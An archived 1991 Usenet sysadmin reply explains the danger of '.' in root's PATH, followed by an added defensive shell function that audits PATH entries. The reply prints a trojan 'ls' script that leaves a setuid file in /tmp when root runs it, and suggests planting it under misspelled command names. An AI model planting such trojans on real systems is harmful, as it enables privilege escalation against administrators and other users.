From: jonw@assip.csasyd.oz (Jon Wright)
Newsgroups: comp.unix.admin
Subject: Re: Mysterious security hole
Message-ID:
Date: 12 Jun 91 23:56:57 GMT
References: <91161.131540SCHDAVZ@YaleVM.YCC.Yale.Edu>
Organization: Computer Sciences of Australia, Pty Ltd.
Lines: 58

In <91161.131540SCHDAVZ@YaleVM.YCC.Yale.Edu> SCHDAVZ@YaleVM.YCC.Yale.Edu (Dave Schweisguth) writes:

>This probably isn't so mysterious, but the subject line has got to be zippy or
>nobody'll read my post.
>
>The 'login' command initializes PATH with (among other useful directories)
>'.'. 'su' leaves '.' out. A footnote to a Unix book I have here hints at a
>security hole involving the _position_ of '.' in PATH, claiming that having
>'.' first is dangerous. It doesn't say why.
>
>These add up to something screwy with '.'. Can someone explain why root/
>Joe User ought/ought not have '.' in his/her path, and if so should it be
>first, last, or anywhere, and (this is the good part) why? The system is an
>SGI Personal Iris, IRIX v3.3.2, if it matters.
>

Simple......

If ROOT has "." in his/her path, I create a file called "ls" in any directory
that is:

  a. I have write permission for
  b. Root may use....

My ls will do the following:

  #!/bin/sh
  WHO=`whoami`
  FILE=/tmp/...gotcha.${WHO}
  echo > ${FILE}
  chmod ugo+rwx ${FILE}
  chmod ug+s ${FILE}
  /bin/ls $*

or something similar (I don't want an argument about the correctness of this
example - the idea is right).

Now I wait patiently and keep checking /tmp; eventually root will try to run ls
in that directory, and bingo, I now have a setuid file that I can modify.

Obviously I need to pick a command that is not built into the shell and also
that appears in the path later than ".". If "." is at the end, then try common
misspellings of commands such as "ls-" and "act" etc.
>
>This may well be an FAQ (the book certainly seems to think so) but I haven't
>found an FAQ list. If there is one, please let me know. Thanks!
>
> _____________________________________________________________________________
>/                                                                             \
>| Dave Schweisguth              5386 Yale Station            203-436-2694     |
>| schdavz@yalevm.ycc.yale.edu   New Haven, CT 06502-5386                      |
>\_____________________________________________________________________________/

Hope this helps,

Regards,

Jon Gilbert Wright
Network Manager                      Unix Systems Consultant
Computer Sciences of Australia       Guru Software Services
jonw@assip.csasyd.oz                 gremlin@runxtsa.runx.oz
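A defender-side check for the hazard Jon describes, added here as an example and not part of the original thread: a POSIX sh function (the name `audit_path` is my own) that flags the PATH entries which make the planted-command trick possible, namely ".", empty fields (which also mean the current directory), relative entries, and world-writable directories.

```sh
#!/bin/sh
# audit_path: report PATH entries that let a planted command shadow a real one.
# Flags ".", empty fields (a leading/trailing ":" or "::" also means the
# current directory), relative entries, and absolute directories that are
# world-writable. Prints one line per finding; returns 1 if anything was
# flagged, 0 if the PATH looks clean. Uses $PATH when no argument is given.
audit_path() {
    path="${1-$PATH}"
    found=0
    # Walk the fields by hand so empty fields survive (splitting on IFS
    # would collapse "::" and hide exactly the entry we care about).
    rest="$path:"
    while [ -n "$rest" ]; do
        entry="${rest%%:*}"
        rest="${rest#*:}"
        case "$entry" in
            "")
                echo "RISK empty entry (current directory) in PATH"
                found=1 ;;
            .)
                echo "RISK \".\" (current directory) in PATH"
                found=1 ;;
            /*)
                # -H resolves a symlinked entry such as /bin -> usr/bin;
                # -perm -002 is the POSIX spelling of "others may write".
                if [ -d "$entry" ] &&
                   [ -n "$(find -H "$entry" -prune -perm -002 2>/dev/null)" ]; then
                    echo "RISK world-writable directory in PATH: $entry"
                    found=1
                fi ;;
            *)
                echo "RISK relative entry in PATH: $entry"
                found=1 ;;
        esac
    done
    return $found
}

# Constructed sample PATHs in the shape of the login/su difference discussed
# above: login appends ".", su leaves it out.
audit_path "/usr/bin:/bin:." || echo "login-style PATH: unsafe"
audit_path "/usr/bin:/bin" && echo "su-style PATH: clean"
```

Run it against a root shell's actual PATH (`audit_path` with no argument) after login and after su to see the difference Dave noticed.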